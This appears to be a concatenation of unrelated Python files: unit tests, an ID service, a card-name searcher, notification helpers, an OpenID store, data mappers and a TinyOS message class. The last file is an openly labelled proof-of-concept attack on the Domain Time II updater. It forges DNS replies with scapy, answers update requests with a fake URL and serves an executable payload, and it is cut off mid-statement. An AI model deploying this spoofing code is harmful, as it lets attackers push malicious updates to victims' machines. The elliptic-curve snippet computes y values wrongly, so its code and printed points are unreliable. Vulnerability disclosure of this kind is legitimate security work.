self.assertEqual(len(comp.results), 3196)
# multi-case multi-stage input data
def test_eee_hpt(self):
# inp = 'eee_hpt.inp'
comp = set_as_top(AxodCompn(input_filename='eee_hpt.inp'))
comp.run()
from platform import architecture
# 'desired' from Linux, 'tolerance' for Windows/Mac.
assert_rel_error(self, comp.hpower, 3323.77880859375, 0.00015)
assert_rel_error(self, comp.tott[0], 757.75458, 0.001)
assert_rel_error(self, comp.totp[0], 8.223134, 0.001)
assert_rel_error(self, comp.mflow[0], 4.9717932, 0.001)
assert_rel_error(self, comp.effs[0], 0.95300001, 0.0001)
assert_rel_error(self, comp.effr[0], 0.90600002, 0.0001)
self.assertEqual(len(comp.results), 19773)
def test_no_input(self):
try:
set_as_top(AxodCompn(input_filename='no-such-file'))
except IOError, exc:
msg = "[Errno 2] No such file or directory: 'no-such-file'"
self.assertEqual(str(exc), msg)
else:
self.fail('Expected IOError')
def test_transdata_input(self):
self.top = set_as_top(Assembly())
self.top.add('tempdata',temp_data())
self.top.add('axodcompn',AxodCompn(input_filename='one_stage.inp'))
self.top.add('nextdata',next_data())
#self.top.driver.workflow.add(['tempdata', 'axodcompn'])
self.top.driver.workflow.add(['tempdata', 'axodcompn', 'nextdata'])
self.top.connect('tempdata.ttout', 'axodcompn.Case1.Stage1.ttin')
self.top.connect('tempdata.ptout', 'axodcompn.Case1.Stage1.ptin')
self.top.connect('axodcompn.hpower', 'nextdata.hpower')
try:
# execute axod with new output file...
self.top.run()
# 'desired' from Linux, 'tolerance' for Windows.
assert_rel_error(self, self.top.axodcompn.hpower, 696.92260742, 0.0001)
assert_rel_error(self, self.top.axodcompn.tott[0], 429.664, 0.001)
assert_rel_error(self, self.top.axodcompn.totp[0], 7.05674, 0.0001)
assert_rel_error(self, self.top.nextdata.hpower, 696.92260742, 0.0001)
except IOError:
print ' problem running code'
# def tearDown(self):
# self.top = None
if __name__ == '__main__':
import nose
sys.argv.append('--cover-package=openmdao')
sys.argv.append('--cover-erase')
nose.runmodule()
|
from typing import NoReturn
from gloop.models.remote_player import RemotePlayer
class WebSocketPlayer(RemotePlayer):
def __init__(self, socket):
self.socket = socket
async def send(self, message: str) -> NoReturn:
await self.socket.send_json(message)
async def receive(self) -> str:
return await self.socket.receive_json()
|
"""
Copyright © 2021 William L Horvath II
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from typing import Any, Final
from co.deability.identifier import config
from co.deability.identifier.api.repositories.id_repository import (
IdRepository,
IdRepositoryType,
)
from co.deability.identifier.errors.BadRequestError import BadRequestError
from co.deability.identifier.errors.IllegalArgumentError import IllegalArgumentError
WRITER_REPOSITORY: Final[IdRepository] = IdRepository(
repository_type=IdRepositoryType.WRITER
)
def create_new_id(id_repository: IdRepository = WRITER_REPOSITORY) -> dict:
return {"created": id_repository.create_id(retries=config.MAX_WRITE_RETRIES)}
def add_data(
data: dict[str, Any],
identifier: str,
id_repository: IdRepository = WRITER_REPOSITORY,
) -> dict[str, Any]:
if not data:
raise BadRequestError(message="The data is missing or empty.")
id_repository.add_data(data=data, identifier=identifier)
return get_current_data(identifier=identifier)
def get_current_data(identifier: str) -> dict[str, Any]:
data: Any = _get_reader().get_current_data(identifier=identifier)
if not data:
data = {}
return {f"{identifier}": data}
def get_all_data(identifier: str) -> dict[str, Any]:
return {f"{identifier}": _get_reader().get_all_data(identifier=identifier)}
def exists(identifier: str) -> dict:
return {f"{identifier} exists": _get_reader().exists(identifier=identifier)}
def _get_reader() -> IdRepository:
return IdRepository(repository_type=IdRepositoryType.READER)
class IdCreator:
"""
Service class that supports use of a specific IdRepository instance, which must be an
IdRepositoryType.WRITER type.
"""
def __init__(
self,
id_repository: IdRepository = WRITER_REPOSITORY,
):
if not id_repository.get_type() == IdRepositoryType.WRITER:
raise IllegalArgumentError(
message="The supplied repository is not a supported type."
)
self.id_repository = id_repository
def get_new_id(self) -> dict:
return create_new_id(id_repository=self.id_repository)
def add_data(self, data: dict[str, Any], identifier: str) -> dict[str, Any]:
return add_data(
data=data, identifier=identifier, id_repository=self.id_repository
)
|
"""
Completes Hearthstone Card Lookup through comparing search queries to card names
"""
import copy
class Searcher:
def __init__(self, card_dict):
"""Initializes a Searcher object with a card dictionary provided
Args: card_dict(dict): Card dictionary with cards are separated
into sub dictionaries by set and names are located in a key named 'name'
"""
self.card_dict = copy.deepcopy(card_dict)
def change_card_dict(self, card_dict):
"""Replaces the currently used card dictionary with a deep copy of another
Args: card_dict(dict): Card dictionary with cards are separated
into sub dictionaries by set and names are located in a key named 'name'
"""
self.card_dict = copy.deepcopy(card_dict)
def find_card(self, query):
"""Finds the best matching card and returns its information
Args: query(string): Search query to use for lookup
Returns:
dict: Card information of best matching card
None: If no suitable matches were found return None
"""
results = self._find_matches(query, 0.5)
if len(results) > 0:
results.sort(key=lambda result: result[1], reverse=True)
return results[0][0]
else:
return None
def _find_matches(self, query, min_match):
"""Finds all cards matching a query and returns them
Args:
query(string): Search query to use for lookup
min_match(number): Minimum value for a card to be matched.
Value can range from 0 to 1.
Returns:
list: List of unsorted lists containing card information then its match percent
"""
result_list = []
l_query = query.lower()
#The card dictionary main keys are the sets card belongs to
for exp in self.card_dict:
for card in self.card_dict[exp]:
#Change all uppercase letters to lowercase in preparation for string comparisons
l_cardname = card['name'].lower()
percent_match = 0
search_words = {}
#Create a sub dictionary for each search word in the query
for word in l_query.split(' '):
search_words.update({word : {}})
card_words = l_cardname.split(' ')
#Calculate the match percentage between every search word and every card word
for search_word in search_words:
for card_word in card_words:
match = 1 - (Searcher.levenshtein_distance(search_word, card_word) /
max(len(search_word), len(card_word)))
if search_word not in search_words.keys():
search_words[search_word] = {card_word: { 'match' : match } }
else:
search_words[search_word].update( {card_word: { 'match' : match } } )
#Calculates the total match mercentage for the entire query and the card name
for search_word in search_words:
max_value_key = list(search_words[search_word].keys())[0]
max_value = search_words[search_word][max_value_key]
for card_word in search_words[search_word]:
if search_words[search_word][card_word]['match'] > max_value['match']:
max_value_key = card_word
max_value = search_words[search_word][card_word]
percent_card_match = len(max_value_key) / len(l_cardname.replace(" ", ""))
percent_query_match = len(search_word) / len(l_query.replace(" ", ""))
#These weights emphasizes matching the query more than the entire card
card_match_weight = 0.25
query_match_weight = 1 - card_match_weight
percent_match += (percent_query_match * max_value['match'] * query_match_weight +
percent_card_match * max_value['match'] * card_match_weight)
if percent_match >= min_match:
result_list.append([card, percent_match])
return result_list
def levenshtein_distance(s1,s2):
"""Levenshtein Distance Algorithm taken from Wikibooks
Args:
s1(string): First string for comparisons
s2(string): Second string for comparisons
Returns:
int: The levenshtein distance between two strings
"""
if len(s1) < len(s2):
return Searcher.levenshtein_distance(s2, s1)
# len(s1) >= len(s2)
if len(s2) == 0:
return len(s1)
previous_row = range(len(s2) + 1)
for i, c1 in enumerate(s1):
current_row = [i + 1]
for j, c2 in enumerate(s2):
insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer
deletions = current_row[j] + 1 # than s2
substitutions = previous_row[j] + (c1 != c2)
current_row.append(min(insertions, deletions, substitutions))
previous_row = current_row
return previous_row[-1]
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import urllib2
import json
from pushbullet import Pushbullet
import profile
def sendNotification_Pushetta(message):
data = {
"body" : message,
"message_type" : "text/plain"
}
req = urllib2.Request('http://api.pushetta.com/api/pushes/{0}/'.format(profile.pushetta_channel))
req.add_header('Content-Type', 'application/json')
req.add_header('Authorization', 'Token {0}'.format(profile.pushetta_api))
response = urllib2.urlopen(req, json.dumps(data))
def sendNotification_Pushbullet(message):
pb = Pushbullet(profile.pushbullet_api)
push = pb.push_note("VAOS", message)
def sendNotification(message):
if profile.notification_service == "PUSHBULLET":
sendNotification_Pushbullet(message)
elif profile.notification_service == "PUSHETTA":
sendNotification_Pushetta(message)
|
"""
Placeholders
"""
# You're writing a program, and you don't know what your starting value for your 'initial' variable is yet. The program won't run if you leave it blank, but you don't want to forget you need it! Make a workaround.
|
class default_values:
def __init__(self):
pass
def default_equation():
return "3x-4x^2+1=1"
|
from typing import NamedTuple, List, Optional, Dict, Any
import numpy as np
import torch
from torch import nn as nn
from dpu_utils.ptutils import BaseComponent
class SampleDatapoint(NamedTuple):
input_features: List[float]
target_class: bool
class TensorizedDatapoint(NamedTuple):
input_features: np.ndarray
target_class: np.ndarray
class SimpleRegression(BaseComponent[SampleDatapoint, TensorizedDatapoint]):
"""A simple linear regression model used for testing."""
def __init__(self, name, num_features: int, hyperparameters: Optional[Dict[str, Any]] = None):
super(SimpleRegression, self).__init__(name, hyperparameters)
self.__num_features = num_features
@classmethod
def default_hyperparameters(cls) -> Dict[str, Any]:
return {}
def _load_metadata_from_sample(self, data_to_load: SampleDatapoint) -> None:
pass # No metadata in this simple model.
def _finalize_component_metadata_and_model(self) -> None:
self.__layer = nn.Linear(self.__num_features, 1, bias=False)
self.__bias = nn.Parameter(torch.tensor(0, dtype=torch.float32)) # Use a separate bias to allow freezing the weights.
self.__loss = nn.BCEWithLogitsLoss()
def load_data_from_sample(self, data_to_load: SampleDatapoint) -> Optional[TensorizedDatapoint]:
return TensorizedDatapoint(
input_features=np.array(data_to_load.input_features, dtype=np.float32),
target_class=np.array(1 if data_to_load.target_class else 0, dtype=np.float32)
)
def initialize_minibatch(self) -> Dict[str, Any]:
return {
'inputs': [],
'targets': []
}
def extend_minibatch_by_sample(self, datapoint: TensorizedDatapoint, accumulated_minibatch_data: Dict[str, Any]) -> bool:
accumulated_minibatch_data['inputs'].append(datapoint.input_features)
accumulated_minibatch_data['targets'].append(datapoint.target_class)
return True
def finalize_minibatch(self, accumulated_minibatch_data: Dict[str, Any]) -> Dict[str, Any]:
return {
'inputs': torch.tensor(np.stack(accumulated_minibatch_data['inputs'], axis=0), device=self.device),
'targets': torch.tensor(np.stack(accumulated_minibatch_data['targets'], axis=0), device=self.device)
}
def predict(self, inputs: torch.Tensor):
predicted = self.__layer(inputs)[:, 0] + self.__bias # B
return predicted >= 0
def forward(self, inputs, targets):
predicted = self.__layer(inputs)[:, 0] + self.__bias # B
loss = self.__loss(input=predicted, target=targets)
return loss
|
# -*- coding: utf-8 -*-
# https://tex2e.github.io/blog/crypto/point-of-elliptic-curve-over-GF
def quadratic_residue(a, p):
return pow(a, (p - 1) // 2, p) == 1
def f(x, a, b, p):
return (x**3 + a*x + b) % p
def calc_y(z, p):
res = z**3 % p
return res % p, -res % p
def disply_points(a, b, p):
points = []
for x in range(p):
z = f(x, a, b, p)
if quadratic_residue(z, p):
y1, y2 = calc_y(z, p)
print('x = %2d, z = %d, quadratic_residue(%2d, %d)? = True, y = %d, %d' % (x, z, x, p, y1, y2))
points.append((x, y1))
points.append((x, y2))
else:
print('x = %2d, z = %d, quadratic_residue(%2d, %d)? = False' % (x, z, x, p))
print("points:")
print(sorted(points))
print(len(points))
p = 31
disply_points(2, 17, p)
# x = 0, z = 17, quadratic_residue( 0, 31)? = False
# x = 1, z = 20, quadratic_residue( 1, 31)? = True, y = 2, 29
# x = 2, z = 29, quadratic_residue( 2, 31)? = False
# x = 3, z = 19, quadratic_residue( 3, 31)? = True, y = 8, 23
# x = 4, z = 27, quadratic_residue( 4, 31)? = False
# x = 5, z = 28, quadratic_residue( 5, 31)? = True, y = 4, 27
# x = 6, z = 28, quadratic_residue( 6, 31)? = True, y = 4, 27
# x = 7, z = 2, quadratic_residue( 7, 31)? = True, y = 8, 23
# x = 8, z = 18, quadratic_residue( 8, 31)? = True, y = 4, 27
# x = 9, z = 20, quadratic_residue( 9, 31)? = True, y = 2, 29
# x = 10, z = 14, quadratic_residue(10, 31)? = True, y = 16, 15
# x = 11, z = 6, quadratic_residue(11, 31)? = False
# x = 12, z = 2, quadratic_residue(12, 31)? = True, y = 8, 23
# x = 13, z = 8, quadratic_residue(13, 31)? = True, y = 16, 15
# x = 14, z = 30, quadratic_residue(14, 31)? = False
# x = 15, z = 12, quadratic_residue(15, 31)? = False
# x = 16, z = 22, quadratic_residue(16, 31)? = False
# x = 17, z = 4, quadratic_residue(17, 31)? = True, y = 2, 29
# x = 18, z = 26, quadratic_residue(18, 31)? = False
# x = 19, z = 1, quadratic_residue(19, 31)? = True, y = 1, 30
# x = 20, z = 28, quadratic_residue(20, 31)? = True, y = 4, 27
# x = 21, z = 20, quadratic_residue(21, 31)? = True, y = 2, 29
# x = 22, z = 14, quadratic_residue(22, 31)? = True, y = 16, 15
# x = 23, z = 16, quadratic_residue(23, 31)? = True, y = 4, 27
# x = 24, z = 1, quadratic_residue(24, 31)? = True, y = 1, 30
# x = 25, z = 6, quadratic_residue(25, 31)? = False
# x = 26, z = 6, quadratic_residue(26, 31)? = False
# x = 27, z = 7, quadratic_residue(27, 31)? = True, y = 2, 29
# x = 28, z = 15, quadratic_residue(28, 31)? = False
# x = 29, z = 5, quadratic_residue(29, 31)? = True, y = 1, 30
# x = 30, z = 14, quadratic_residue(30, 31)? = True, y = 16, 15
# points:
# [(1, 2), (1, 29), (3, 8), (3, 23), (5, 4), (5, 27), (6, 4), (6, 27), (7, 8), (7, 23), (8, 4), (8, 27), (9, 2), (9, 29), (10, 15), (10, 16), (12, 8), (12, 23), (13, 15), (13, 16), (17, 2), (17, 29), (19, 1), (19, 30), (20, 4), (20, 27), (21, 2), (21, 29), (22, 15), (22, 16), (23, 4), (23, 27), (24, 1), (24, 30), (27, 2), (27, 29), (29, 1), (29, 30), (30, 15), (30, 16)]
# 40
p = 5
disply_points(1, 1, p)
# x = 0, z = 1, quadratic_residue( 0, 5)? = True, y = 1, 4
# x = 1, z = 3, quadratic_residue( 1, 5)? = False
# x = 2, z = 1, quadratic_residue( 2, 5)? = True, y = 1, 4
# x = 3, z = 1, quadratic_residue( 3, 5)? = True, y = 1, 4
# x = 4, z = 4, quadratic_residue( 4, 5)? = True, y = 4, 1
# points:
# [(0, 1), (0, 4), (2, 1), (2, 4), (3, 1), (3, 4), (4, 1), (4, 4)]
# 8
p = 11
disply_points(1, 6, p)
|
"""
MoinMoin - OpenID utils
@copyright: 2006, 2007 Johannes Berg <johannes@sipsolutions.net>
@license: GNU GPL, see COPYING for details.
"""
from random import randint
import time
from openid import oidutil
from openid.store.interface import OpenIDStore
from openid.association import Association
from openid.store import nonce
from MoinMoin import caching
from MoinMoin.support.python_compatibility import hash_new
from MoinMoin import log
logging = log.getLogger(__name__)
# redirect openid logging to moin log
def log(msg, level=0):
logging.log(level, msg)
oidutil.log = log
def strbase64(value):
from base64 import encodestring
return encodestring(str(value)).replace('\n', '')
def _cleanup_nonces(request):
cachelist = caching.get_cache_list(request, 'openid-nonce', 'farm')
# really openid should have a method to check this...
texpired = time.time() - nonce.SKEW
for name in cachelist:
entry = caching.CacheEntry(request, 'openid-nonce', name,
scope='farm', use_pickle=False)
try:
timestamp = int(entry.content())
if timestamp < texpired:
entry.remove()
except caching.CacheError:
pass
class MoinOpenIDStore(OpenIDStore):
'''OpenIDStore for MoinMoin'''
def __init__(self, request):
self.request = request
OpenIDStore.__init__(self)
def key(self, url):
'''return cache key'''
return hash_new('sha1', url).hexdigest()
def storeAssociation(self, server_url, association):
ce = caching.CacheEntry(self.request, 'openid', self.key(server_url),
scope='wiki', use_pickle=True)
if ce.exists():
assocs = ce.content()
else:
assocs = []
assocs += [association.serialize()]
ce.update(assocs)
def getAssociation(self, server_url, handle=None):
ce = caching.CacheEntry(self.request, 'openid', self.key(server_url),
scope='wiki', use_pickle=True)
if not ce.exists():
return None
assocs = ce.content()
found = False
for idx in xrange(len(assocs)-1, -1, -1):
assoc_str = assocs[idx]
association = Association.deserialize(assoc_str)
if association.getExpiresIn() == 0:
del assocs[idx]
else:
if handle is None or association.handle == handle:
found = True
break
ce.update(assocs)
if found:
return association
return None
def removeAssociation(self, server_url, handle):
ce = caching.CacheEntry(self.request, 'openid', self.key(server_url),
scope='wiki', use_pickle=True)
if not ce.exists():
return
assocs = ce.content()
for idx in xrange(len(assocs)-1, -1, -1):
assoc_str = assocs[idx]
association = Association.deserialize(assoc_str)
if association.handle == handle:
del assocs[idx]
if len(assocs):
ce.update(assocs)
else:
ce.remove()
def useNonce(self, server_url, timestamp, salt):
val = ''.join([str(server_url), str(timestamp), str(salt)])
csum = hash_new('sha1', val).hexdigest()
ce = caching.CacheEntry(self.request, 'openid-nonce', csum,
scope='farm', use_pickle=False)
if ce.exists():
# nonce already used!
return False
ce.update(str(timestamp))
if randint(0, 999) == 0:
self.request.add_finisher(_cleanup_nonces)
return True
|
# This file is part of the bapsflib package, a Python toolkit for the
# BaPSF group at UCLA.
#
# http://plasma.physics.ucla.edu/
#
# Copyright 2017-2018 Erik T. Everson and contributors
#
# License: Standard 3-clause BSD; see "LICENSES/LICENSE.txt" for full
# license terms and contributor agreement.
"""
Module for the N5700PS power supply mapper
`~bapsflib._hdf.maps.controls.n5700ps.HDFMapControlN5700PS`.
"""
__all__ = ["HDFMapControlN5700PS"]
import h5py
import numpy as np
import warnings
from warnings import warn
from bapsflib.utils import _bytes_to_str
from bapsflib.utils.exceptions import HDFMappingError
from .templates import HDFMapControlCLTemplate
from .types import ConType
class HDFMapControlN5700PS(HDFMapControlCLTemplate):
"""
Mapping module for control device 'N5700_PS'.
Simple group structure looks like:
.. code-block:: none
+-- N5700_PS
| +-- Run time list
| +-- nsconf_<descr>
| | +--
"""
def __init__(self, group: h5py.Group):
"""
:param group: the HDF5 control device group
"""
# initialize
HDFMapControlCLTemplate.__init__(self, group)
# define control type
self._info["contype"] = ConType.power
# define known command list RE patterns
self._default_re_patterns = (
r"(?P<VOLT>(\bSOURCE:VOLTAGE:LEVEL\s)(?P<VAL>(\d+\.\d*|\.\d+|\d+\b)))",
)
# populate self.configs
self._build_configs()
def _build_configs(self):
"""Builds the :attr:`configs` dictionary."""
# check there are configurations to map
if len(self.subgroup_names) == 0:
why = "has no mappable configurations"
raise HDFMappingError(self._info["group path"], why=why)
# build configuration dictionaries
# - assume every sub-group represents a unique configuration
# to the control device
# - the name of each sub-group is used as the configuration
# name
# - assume all configurations are active (i.e. used)
#
for name in self.subgroup_names:
# get configuration group
cong = self.group[name]
# get dataset
try:
dset = self.group[self.construct_dataset_name()]
except KeyError:
why = (
f"Dataset '{self.construct_dataset_name()}' not found "
f"configuration group '{name}'"
)
raise HDFMappingError(self._info["group path"], why=why)
# initialize _configs
self._configs[name] = {}
# ---- define general info values ----
pairs = [
("IP address", "IP address"),
("power supply device", "Model Number"),
("initial state", "Initialization commands"),
("command list", "N5700 power supply command list"),
]
for pair in pairs:
try:
# get attribute value
val = cong.attrs[pair[1]]
# condition value
if pair[0] == "command list":
# - val gets returned as a np.bytes_ string
# - split line returns
# - remove trailing/leading whitespace
#
val = _bytes_to_str(val).splitlines()
val = tuple([cls.strip() for cls in val])
else:
# pair[0] in ('IP address',
# 'power supply device',
# 'initial state'):
# - val is a np.bytes_ string
#
val = _bytes_to_str(val)
# assign val to _configs
self._configs[name][pair[0]] = val
except KeyError:
self._configs[name][pair[0]] = None
warn_str = (
f"Attribute '{pair[1]}' not found in control device "
f"'{self.device_name}' configuration group '{name}'"
)
if pair[0] != "command list":
warn_str += ", continuing with mapping"
warn(warn_str)
else:
why = (
f"Attribute '{pair[1]}' not found for configuration "
f"group '{name}'"
)
raise HDFMappingError(self._info["group path"], why=why)
# ---- define 'dset paths' ----
self._configs[name]["dset paths"] = (dset.name,)
# ---- define 'shotnum' ----
# initialize
self._configs[name]["shotnum"] = {
"dset paths": self._configs[name]["dset paths"],
"dset field": ("Shot number",),
"shape": dset.dtype["Shot number"].shape,
"dtype": np.int32,
}
# ---- define 'state values' ----
# catch and suppress warnings only for initialization
with warnings.catch_warnings():
warnings.simplefilter("ignore")
try:
sv_dict = self._construct_state_values_dict(
name, self._default_re_patterns
)
except KeyError:
sv_dict = {}
# initialize
self._configs[name]["state values"] = (
sv_dict if bool(sv_dict) else self._default_state_values_dict(name)
)
def _default_state_values_dict(self, config_name: str) -> dict:
# define default dict
default_dict = {
"command": {
"dset paths": self._configs[config_name]["dset paths"],
"dset field": ("Command index",),
"re pattern": None,
"command list": self._configs[config_name]["command list"],
"cl str": self._configs[config_name]["command list"],
"shape": (),
}
}
default_dict["command"]["dtype"] = np.array(
default_dict["command"]["command list"]
).dtype
# return
return default_dict
def construct_dataset_name(self, *args) -> str:
"""
Constructs name of dataset containing control state value data.
"""
return "Run time list"
|
A = AdemAlgebra(2)
A.compute_basis(20)
M = FDModule(A, "M", 0)
M.add_generator(0, "x0")
M.add_generator(2, "x2")
M.parse_action("Sq2 x0 = x2", None)
M.freeze()
r = ext.resolution.Resolver("Ceta", module=M)
Ceta = ResolverChannel(r, REPL)
await Ceta.setup_a()
Ceta.chart.sseq.initial_x_range = [0, 40]
Ceta.chart.sseq.initial_y_range = [0, 20]
Ceta.chart.x_range = [0, 80]
Ceta.chart.y_range = [0, 40]
Ceta.resolver.resolve(50)
|
from data_structures.reverse_linked_list import *
# def test_import():
# assert reverse_list
|
#
# This class is automatically generated by mig. DO NOT EDIT THIS FILE.
# This class implements a Python interface to the 'Msg'
# message type.
#
import tinyos.message.Message
# The default size of this message type in bytes.
DEFAULT_MESSAGE_SIZE = 6
# The Active Message type associated with this message.
AM_TYPE = 202
class Msg(tinyos.message.Message.Message):
# Create a new Msg of size 6.
def __init__(self, data="", addr=None, gid=None, base_offset=0, data_length=6):
tinyos.message.Message.Message.__init__(self, data, addr, gid, base_offset, data_length)
self.amTypeSet(AM_TYPE)
# Get AM_TYPE
def get_amType(cls):
return AM_TYPE
get_amType = classmethod(get_amType)
#
# Return a String representation of this message. Includes the
# message type name and the non-indexed field values.
#
def __str__(self):
s = "Message <Msg> \n"
try:
s += " [node=0x%x]\n" % (self.get_node())
except:
pass
try:
s += " [var_id=0x%x]\n" % (self.get_var_id())
except:
pass
try:
s += " [var_type=0x%x]\n" % (self.get_var_type())
except:
pass
try:
s += " [ve_start_byte=0x%x]\n" % (self.get_ve_start_byte())
except:
pass
return s
# Message-type-specific access methods appear below.
#
# Accessor methods for field: node
# Field type: int
# Offset (bits): 0
# Size (bits): 16
#
#
# Return whether the field 'node' is signed (False).
#
def isSigned_node(self):
return False
#
# Return whether the field 'node' is an array (False).
#
def isArray_node(self):
return False
#
# Return the offset (in bytes) of the field 'node'
#
def offset_node(self):
return (0 / 8)
#
# Return the offset (in bits) of the field 'node'
#
def offsetBits_node(self):
return 0
#
# Return the value (as a int) of the field 'node'
#
def get_node(self):
return self.getUIntElement(self.offsetBits_node(), 16, 1)
#
# Set the value of the field 'node'
#
def set_node(self, value):
self.setUIntElement(self.offsetBits_node(), 16, value, 1)
#
# Return the size, in bytes, of the field 'node'
#
def size_node(self):
return (16 / 8)
#
# Return the size, in bits, of the field 'node'
#
def sizeBits_node(self):
return 16
#
# Accessor methods for field: var_id
# Field type: int
# Offset (bits): 16
# Size (bits): 16
#
#
# Return whether the field 'var_id' is signed (False).
#
def isSigned_var_id(self):
return False
#
# Return whether the field 'var_id' is an array (False).
#
def isArray_var_id(self):
return False
#
# Return the offset (in bytes) of the field 'var_id'
#
def offset_var_id(self):
return (16 / 8)
#
# Return the offset (in bits) of the field 'var_id'
#
def offsetBits_var_id(self):
return 16
#
# Return the value (as a int) of the field 'var_id'
#
def get_var_id(self):
return self.getUIntElement(self.offsetBits_var_id(), 16, 1)
#
# Set the value of the field 'var_id'
#
def set_var_id(self, value):
self.setUIntElement(self.offsetBits_var_id(), 16, value, 1)
#
# Return the size, in bytes, of the field 'var_id'
#
def size_var_id(self):
return (16 / 8)
#
# Return the size, in bits, of the field 'var_id'
#
def sizeBits_var_id(self):
return 16
#
# Accessor methods for field: var_type
# Field type: short
# Offset (bits): 32
# Size (bits): 8
#
#
# Return whether the field 'var_type' is signed (False).
#
def isSigned_var_type(self):
return False
#
# Return whether the field 'var_type' is an array (False).
#
def isArray_var_type(self):
return False
#
# Return the offset (in bytes) of the field 'var_type'
#
def offset_var_type(self):
return (32 / 8)
#
# Return the offset (in bits) of the field 'var_type'
#
def offsetBits_var_type(self):
return 32
#
# Return the value (as a short) of the field 'var_type'
#
def get_var_type(self):
return self.getUIntElement(self.offsetBits_var_type(), 8, 1)
#
# Set the value of the field 'var_type'
#
def set_var_type(self, value):
self.setUIntElement(self.offsetBits_var_type(), 8, value, 1)
#
# Return the size, in bytes, of the field 'var_type'
#
def size_var_type(self):
return (8 / 8)
#
# Return the size, in bits, of the field 'var_type'
#
def sizeBits_var_type(self):
return 8
#
# Accessor methods for field: ve_start_byte
# Field type: byte
# Offset (bits): 40
# Size (bits): 8
#
#
# Return whether the field 've_start_byte' is signed (False).
#
def isSigned_ve_start_byte(self):
return False
#
# Return whether the field 've_start_byte' is an array (False).
#
def isArray_ve_start_byte(self):
return False
#
# Return the offset (in bytes) of the field 've_start_byte'
#
def offset_ve_start_byte(self):
return (40 / 8)
#
# Return the offset (in bits) of the field 've_start_byte'
#
def offsetBits_ve_start_byte(self):
return 40
#
# Return the value (as a byte) of the field 've_start_byte'
#
def get_ve_start_byte(self):
return self.getSIntElement(self.offsetBits_ve_start_byte(), 8, 1)
#
# Set the value of the field 've_start_byte'
#
def set_ve_start_byte(self, value):
self.setSIntElement(self.offsetBits_ve_start_byte(), 8, value, 1)
#
# Return the size, in bytes, of the field 've_start_byte'
#
def size_ve_start_byte(self):
return (8 / 8)
#
# Return the size, in bits, of the field 've_start_byte'
#
def sizeBits_ve_start_byte(self):
return 8
|
from .facade import Client
|
#!/usr/bin/env python
from multiprocessing import Process
from time import sleep
import argparse
import http.server
import re
import socketserver
import socket
from scapy.all import *
def build_dns_response(query, name):
ip = query[IP]
udp = query[UDP]
dns = query[DNS]
dns_answer = DNSRR(rrname=name, type='A', rclass='IN', ttl=5, rdata=server_ip)
response = IP(src=ip.dst, dst=ip.src)
response /= UDP(sport=udp.dport, dport=udp.sport)
response /= DNS(id=dns.id, qr=1, aa=0, qdcount=1, ancount=1, qd=dns.qd, an=dns_answer)
return response
def parse_dns_query(pkt):
if DNSRR in pkt:
name = pkt[DNSRR].rrname.decode('UTF-8', errors='backslashreplace')
print(f'DNS Response for "{name}" from {pkt[IP].src}')
elif DNSQR in pkt:
name = pkt[DNSQR].qname.decode('UTF-8', errors='backslashreplace')
print(f'DNS Query for "{name}" from {pkt[IP].src}')
for update_domain in update_domains:
if name.startswith(update_domain):
dns_response = build_dns_response(pkt, name)
send(dns_response, iface=sniff_iface)
print(f'[+] Target DNS Query responded to with {server_ip}')
def parse_dt2_pkt(pkt):
ip = pkt[IP]
udp = pkt[UDP]
print(f'DT2 from {ip.src}:{udp.sport} to {ip.dst}:{udp.dport}')
if ip.dst == server_ip:
update_regex = b'[1-5]\\.[0-9]\\..\\.[0-9]*\x00'
if re.search(update_regex, udp.payload.load):
dt2 = udp.payload
update_response = IP(src=ip.dst, dst=ip.src)
update_response /= UDP(sport=udp.dport, dport=udp.sport)
update_response /= update_url.encode('utf-8') + b"\x00"
send(update_response, iface=sniff_iface)
print(f'[+] Responded to target DT2 Update request: {dt2.load}')
def udp_callback(pkt):
if IP not in pkt or UDP not in pkt:
return
udp = pkt[UDP]
try:
if udp.dport == 53 or udp.sport == 53:
parse_dns_query(pkt)
if udp.dport == 9909 or udp.sport == 9909:
parse_dt2_pkt(pkt)
except Exception as e:
print(f'[!] Packet caused exception: {str(e)}')
print(f' {pkt.summary()}')
class CustomHttpRequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
# strip extra params for pattern matching
if '?' in self.path:
path = self.path[:self.path.find('?')]
else:
path = self.path
if path.endswith('.exe'):
# serve a demonstration payload
self.path = 'files/calc.exe'
return http.server.SimpleHTTPRequestHandler.do_GET(self)
elif path.endswith('.asp'):
# serve our copy of their update page
#self.path = 'files/registered.asp.html'
self.path = 'files/evaluation.asp.html'
return http.server.SimpleHTTPRequestHandler.do_GET(self)
else:
# Redirect to non-www greyware domain so they serve the content
self.send_response(302)
self.send_header('Location', f'http://greyware.com/{self.path}')
self.end_headers()
return
def serve_http_thread(server_ip, http_port):
http_address = (server_ip, http_port)
custom_http_server = socketserver.TCPServer(http_address, CustomHttpRequestHandler)
print(f'Serving HTTP at {server_ip} on port {http_port}...')
try:
while True:
custom_http_server.handle_request()
except KeyboardInterrupt:
pass
print('HTTP server stopped.')
def recv_udp(server_ip):
"""Keep 9909:UDP open but do nothing; response happens in sniffer."""
udp_address = (server_ip, 9909)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(udp_address)
print(f'Ready for DT2 traffic at {server_ip}')
try:
while True:
_ = s.recv(0x1000)
except KeyboardInterrupt:
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser('upgrade_attack.py', description='Proof of concept MotS on DT2 upgrade')
parser.add_argument('interface', help='Interface to sniff/send on')
parser.add_argument('ip_address', help='IP to serve fake update on')
parser.add_argument('-i', '--http_impersonation', help='Run the HTTP impersonation PoC',
default=False, action='store_true')
parser.add_argument('-p', '--port', help='Port to serve fake update on',
type=int, default=80)
args = parser.parse_args()
sniff_iface = args.interface
server_ip = args.ip_address
http_port = args.port
if http_port == 80:
port_string = ''
else:
port_string = f':{http_port}'
# Legitimate update link example:
# 'https://www.greyware.com/software/domaintime/update/evaluation.asp'
if args.http_impersonation:
# This points to their URL (HTTP), which assumes we can win DNS and HTTP races
update_url = 'http://www.greyware.com/software/domaintime/update/evaluation.asp'
#update_url = 'http://www.greyware.com/software/domaintime/update/registered.asp'
else:
